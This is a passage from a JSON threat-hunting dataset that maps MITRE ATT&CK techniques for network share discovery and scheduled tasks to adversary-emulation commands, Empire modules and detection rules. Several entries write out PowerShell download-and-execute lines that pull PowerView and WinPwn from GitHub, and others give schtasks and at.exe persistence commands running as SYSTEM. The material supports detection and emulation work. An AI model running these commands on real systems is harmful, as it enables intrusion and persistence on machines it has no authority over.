displayed.\n", + "supported_platforms": [ + "windows" + ], + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Endpoint must be joined to domain\n", + "prereq_command": "if ((Get-WmiObject -Class Win32_ComputerSystem).PartofDomain) {exit 0} else {exit 1}\n", + "get_prereq_command": "\"Join system to domain\"\n" + } + ], + "executor": { + "command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Find-DomainShare -CheckShareAccess -Verbose\n", + "name": "powershell" + } + }, + { + "name": "PowerView ShareFinder", + "auto_generated_guid": "d07e4cc1-98ae-447e-9d31-36cb430d28c4", + "description": "PowerView is a PowerShell tool to gain network situational awareness on Windows domains. ShareFinder finds (non-standard) shares on machines in the domain.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "parameters": { + "description": "ShareFinder parameter", + "type": "String", + "default": "-CheckShareAccess" + } + }, + "dependencies": [ + { + "description": "Invoke-ShareFinder module must exist in %TEMP% directory", + "prereq_command": "if (Test-Path $env:TEMP\\PowerView.ps1) {exit 0} else {exit 1}", + "get_prereq_command": "Invoke-WebRequest \"https://raw.githubusercontent.com/darkoperator/Veil-PowerView/8784e33f17ee7543ba2f45e27dc5f08ea3a1b856/PowerView/powerview.ps1\" -OutFile $env:TEMP\\PowerView.ps1\n" + } + ], + "executor": { + "command": "Import-Module $env:TEMP\\PowerView.ps1\nInvoke-ShareFinder #{parameters}\n", + "name": "powershell" + } + }, + { + "name": "WinPwn - shareenumeration", + "auto_generated_guid": "987901d1-5b87-4558-a6d9-cffcabc638b8", + "description": "Network share enumeration using the shareenumeration function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nshareenumeration -noninteractive -consoleoutput", + "name": "powershell" + } + } + ] + }, + { + "id": "530e47c6-8592-42bf-91df-c59ffbd8541b", + "name": "View admin shares", + "description": "Network Share Discovery", + "tactic": "discovery", + "technique": { + "attack_id": "T1135", + "name": "Network Share Discovery" + }, + "platforms": { + "windows": { + "pwsh,psh": { + "command": "Get-SmbShare | ConvertTo-Json", + "parsers": { + "plugins.stockpile.app.parsers.json": [ + { + "source": "domain.smb.share", + "custom_parser_vals": { + "json_key": "Path", + "json_type": "str" + } + } + ] + } + } + } + } + }, + { + "id": "deeac480-5c2a-42b5-90bb-41675ee53c7e", + "name": "View remote shares", + "description": "View the shares of a remote host", + "tactic": "discovery", + "technique": { + "attack_id": "T1135", + "name": "Network Share Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "net view \\\\#{remote.host.fqdn} /all", + "parsers": { + "plugins.stockpile.app.parsers.net_view": [ + { + "source": "remote.host.fqdn", + "edge": "has_share", + "target": "remote.host.share" + } + ] + } + }, + "cmd": { + "command": "net view \\\\#{remote.host.fqdn} /all", + "parsers": { + "plugins.stockpile.app.parsers.net_view": [ + { + "source": "remote.host.fqdn", + "edge": "has_share", + "target": "remote.host.share" + } + ] + } + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_dfs_share", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_dfs_share\": [\"T1135\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/share_finder", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/share_finder\": [\"T1135\"]," + }, + { + "Empire Module": "python/situational_awareness/network/active_directory/get_fileservers", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/active_directory/get_fileservers\": [\"T1135\"]," + }, + { + "Empire Module": "python/situational_awareness/network/smb_mount", + "ATT&CK Technique #1": "T1135", + "ATT&CK Technique #2": "", + "Technique": "Network Share Discovery", + "Concatenate for Python Dictionary": "\"python/situational_awareness/network/smb_mount\": [\"T1135\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where process_path contains \"net.exe\"and (process_command_line contains \"view\"or process_command_line contains \"share\")", + "name": "Network Share Discovery" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"net.exe\"and (process_command_line contains \"net view\"or process_command_line contains \"net share\"))or process_command_line contains \"get-smbshare -Name\"", + "name": "Network Share Discovery Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "experimental", + "description": "Detects automated lateral movement by Turla group", + "references": [ + "https://securelist.com/the-epic-turla-operation/65545/" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1077", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ], + "author": "Markus Neis", + "date": "2017/11/07", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "detection": { + "selection": { + "CommandLine": [ + "net use \\\\%DomainController%\\C$ \"P@ssw0rd\" *", + "dir c:\\\\*.doc* /s", + "dir %TEMP%\\\\*.exe" + ] + }, + "condition": "selection" + }, + "level": "critical" + }, + { + "detection": { + "netCommand1": { + "CommandLine": "net view /DOMAIN" + }, + "netCommand2": { + "CommandLine": "net session" + }, + "netCommand3": { + "CommandLine": "net share" + }, + "timeframe": "1m", + "condition": "netCommand1 | near netCommand2 and netCommand3" + }, + "level": "medium" + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "Network protocol analysis" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5156", + "Windows Firewall" + ], + [ + "5140/5145", + "Net Shares" + ], + [ + "Network protocol analysis" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1053", + "command_list": [ + "schtasks [/s HOSTNAME]", + "shell schtasks", + "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config schedule start= auto", + "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "schtask.exe /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "schtask.exe /create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "at.exe ##:## /interactive cmd", + "at.exe \\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "net.exe use \\\\[computername|IP] /user:DOMAIN\\username password", + "net.exe time \\\\[computername|IP]", + "schtasks.exe /create * appdata", + "\\\\Windows\\\\.+\\\\at.exe", + "\\\\Windows\\\\.+\\\\schtasks.exe/Create", + "powershell/lateral_movement/new_gpo_immediate_task", + "powershell/persistence/elevated/schtasks", + "powershell/persistence/userland/schtasks" + ], + "commands": [ + { + "command": "schtasks [/s HOSTNAME]", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell schtasks", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config schedule start= auto", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "schtask.exe /Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "schtask.exe /create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "at.exe ##:## /interactive cmd", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "at.exe \\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "net.exe use \\\\[computername|IP] /user:DOMAIN\\username password", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "net.exe time \\\\[computername|IP]", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "schtasks.exe /create * appdata", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\at.exe", + "source": "SysmonHunter - Scheduled Task", + "name": "" + }, + { + "command": "\\\\Windows\\\\.+\\\\schtasks.exe/Create", + "source": "SysmonHunter - Scheduled Task", + "name": "" + }, + { + "command": "powershell/lateral_movement/new_gpo_immediate_task", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/elevated/schtasks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/persistence/userland/schtasks", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1053", + "Built-in Windows Command": "schtasks [/s HOSTNAME]", + "Cobalt Strike": "shell schtasks", + "Metasploit": "", + "Description": "Displays all of the currently scheduled tasks to be run on a computer" + }, + { + "Category": "T1053", + "Built-in Windows Command": "Creating a scheduled task:\nschtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nnet start schedule\nsc config schedule start= auto", + "Cobalt Strike": "Creating a scheduled task:\nshell schtasks [/S HOSTNAME] /create /tn \"acachesrv\" /tr C:\\file\\path\\here.exe /sc ONLOGON /ru \"System\" [/rp password]\nRequirements for running scheduled tasks:\nshell net start schedule\nshell sc config schedule start= auto", + "Metasploit": "", + "Description": "Add scheduled task (/s is name/ip of remote system to do this on; /tn is the name of the task; /sc is when to run; /ru is user to runas; /rp is password for that user)\nmay need to make sure that the schedule service is started and configured to run on boot so that your persistence sticks.\nDelete a scheduled task by name:\nschtasks [/s HOSTNAME] /delete /tn \"name\"" + }, + { + "chain_id": "100184", + "os": "windows", + "parent_process": "schtask.exe", + "commandline_string": "/Create /SC ONCE /TN spawn /TR C:\\windows\\system32\\cmd.exe /ST 20:10", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100185", + "os": "windows", + "parent_process": "schtask.exe", + "commandline_string": "/create /tn \"mysc\" /tr C:\\windows\\system32\\cmd.exe /sc ONLOGON /ru \"System\"", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100186", + "os": "windows", + "parent_process": "at.exe", + "commandline_string": "##:## /interactive cmd", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100187", + "os": "windows", + "parent_process": "at.exe", + "commandline_string": "\\\\[computername|IP] ##:## c:\\temp\\evil.bat", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100188", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "use \\\\[computername|IP] /user:DOMAIN\\username password", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "high", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100189", + "os": "windows", + "parent_process": "net.exe", + "commandline_string": "time \\\\[computername|IP]", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scheduled_task", + "mitre_attack": "T1053", + "itw_sample": "" + }, + { + "chain_id": "100206", + "os": "windows", + "parent_process": "schtasks.exe", + "commandline_string": "/create * appdata", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "", + "mitre_attack": "T1053", + "itw_sample": "fe66f4fec21229bd008d7974f071fae1a1a2ef7a1365cee27675f197719a8e27" + }, + { + "name": "Scheduled Task", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\at.exe", + "flag": "regex" + } + } + }, + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\schtasks.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "/Create" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/new_gpo_immediate_task", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/new_gpo_immediate_task\": [\"T1053\"]," + }, + { + "Empire Module": "powershell/persistence/elevated/schtasks", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/persistence/elevated/schtasks\": [\"T1053\"]," + }, + { + "Empire Module": "powershell/persistence/userland/schtasks", + "ATT&CK Technique #1": "T1053", + "ATT&CK Technique #2": "", + "Technique": "Scheduled Task", + "Concatenate for Python Dictionary": "\"powershell/persistence/userland/schtasks\": [\"T1053\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 11 and process_command_line contains \"C:\\\\WINDOWS\\\\system32\\\\svchost.exe\"or file_name contains \"C:\\\\Windows\\\\System32\\\\Tasks\\\\\"or file_name contains \"C:\\\\Windows\\\\Tasks\\\\\"", + "name": "Scheduled Task FileAccess" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_path contains \"taskeng.exe\"or process_path contains \"schtasks.exe\"or (process_path contains \"svchost.exe\"and process_parent_command_line != \"C:\\\\Windows\\\\System32\\\\services.exe\"))", + "name": "Scheduled Task Process" + } + ], + "possible_detections": [ + { + "action": "global", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "author": "Florian Roth", + "description": "Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group", + "references": [ + "https://securelist.com/apt-slingshot/84312/" + ], + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "medium" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection1": { + "CommandLine": [ + "*schtasks* /delete *Defrag\\ScheduledDefrag*" + ] + } + } + }, + { + "logsource": { + "product": "windows", + "service": "security", + "definition": "Requirements: Audit Policy : Audit Other Object Access Events > Success" + }, + "detection": { + "selection2": { + "EventID": 4701, + "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag" + } + } + }, + { + "title": "Persistence and Execution at scale via GPO scheduled task", + "id": "a8f29a7b-b137-4446-80a0-b804272f3da2", + "description": "Detect lateral movement using GPO scheduled task, ususally used to deploy ransomware at scale", + "author": "Samir Bousseaden", + "references": [ + "https://twitter.com/menasec1/status/1106899890377052160" + ], + "tags": [ + "attack.persistence", + "attack.lateral_movement", + "attack.t1053" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\SYSVOL", + "RelativeTargetName": "*ScheduledTasks.xml", + "Accesses": "*WriteData*" + }, + "condition": "selection" + }, + "falsepositives": [ + "if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks" + ], + "level": "high" + }, + { + "title": "Remote Task Creation via ATSVC named pipe", + "id": "f6de6525-4509-495a-8a82-1f8b0ed73a00", + "description": "Detects remote task creation via at.exe or API interacting with ATSVC namedpipe", + "author": "Samir Bousseaden", + "references": [ + "https://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html" + ], + "tags": [ + "attack.lateral_movement", + "attack.persistence", + "attack.t1053", + "car.2013-05-004", + "car.2015-04-001" + ], + "logsource": { + "product": "windows", + "service": "security", + "description": "The advanced audit policy setting \"Object Access > Audit Detailed File Share\" must be configured for Success/Failure" + }, + "detection": { + "selection": { + "EventID": 5145, + "ShareName": "\\\\*\\IPC$", + "RelativeTargetName": "atsvc", + "Accesses": "*WriteData*" + }, + "condition": "selection" + }, + "falsepositives": [ + "pentesting" + ], + "level": "medium" + }, + { + "title": "Rare Scheduled Task Creations", + "id": "b20f6158-9438-41be-83da-a5a16ac90c2b", + "status": "experimental", + "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.", + "tags": [ + "attack.persistence", + "attack.t1053", + "attack.s0111" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "taskscheduler" + }, + "detection": { + "selection": { + "EventID": 106 + }, + "timeframe": "7d", + "condition": "selection | count() by TaskName < 5" + }, + "falsepositives": [ + "Software installation" + ], + "level": "low" + }, + { + "title": "Rare Schtasks Creations", + "id": "b0d77106-7bb0-41fe-bd94-d1752164d066", + "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", + "status": "experimental", + "author": "Florian Roth", + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.persistence", + "attack.t1053", + "car.2013-08-001" + ], + "logsource": { + "product": "windows", + "service": "security", + "definition": "The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data." + }, + "detection": { + "selection": { + "EventID": 4698 + }, + "timeframe": "7d", + "condition": "selection | count() by TaskName < 5" + }, + "falsepositives": [ + "Software installation", + "Software updates" + ], + "level": "low" + }, + { + "title": "Scheduled Task Creation", + "id": "92626ddd-662c-49e3-ac59-f6535f12d189", + "status": "experimental", + "description": "Detects the creation of scheduled tasks in user session", + "author": "Florian Roth", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "*\\schtasks.exe", + "CommandLine": "* /create *" + }, + "filter": { + "User": "NT AUTHORITY\\SYSTEM" + }, + "condition": "selection and not filter" + }, + "fields": [ + "CommandLine", + "ParentCommandLine" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053", + "attack.s0111", + "car.2013-08-001" + ], + "falsepositives": [ + "Administrative activity", + "Software installation" + ], + "level": "low" + }, + { + "title": "Windows 10 scheduled task SandboxEscaper 0-day", + "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "status": "experimental", + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "references": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe" + ], + "author": "Olaf Hartong", + "date": "2019/05/22", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image": "schtasks.exe", + "CommandLine": "*/change*/TN*/RU*/RP*" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ], + "tags": [ + "attack.privilege_escalation", + "attack.execution", + "attack.t1053", + "car.2013-08-001" + ], + "level": "high" + }, + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "Windows event logs" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4663", + "File monitoring" + ], + [ + "106", + "Task Registered" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "container", + "definition": "Information about a container within an environment.", + "collection_layers": [ + "container" + ], + "data_source_platform": [ + "Containers" + ], + "data_component": "container creation", + "description": "A container was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "container" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "scheduled job", + "definition": "Information about scheduled work that run automatically in the background of a computer system (Cron deamon, Task Scheduler, BITS).", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Containers" + ], + "data_component": "scheduled job creation", + "description": "A scheduled job was created, either locally or remotely.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "scheduled job" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "http://blog.morphisec.com/fin7-attacks-restaurant-industry", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + 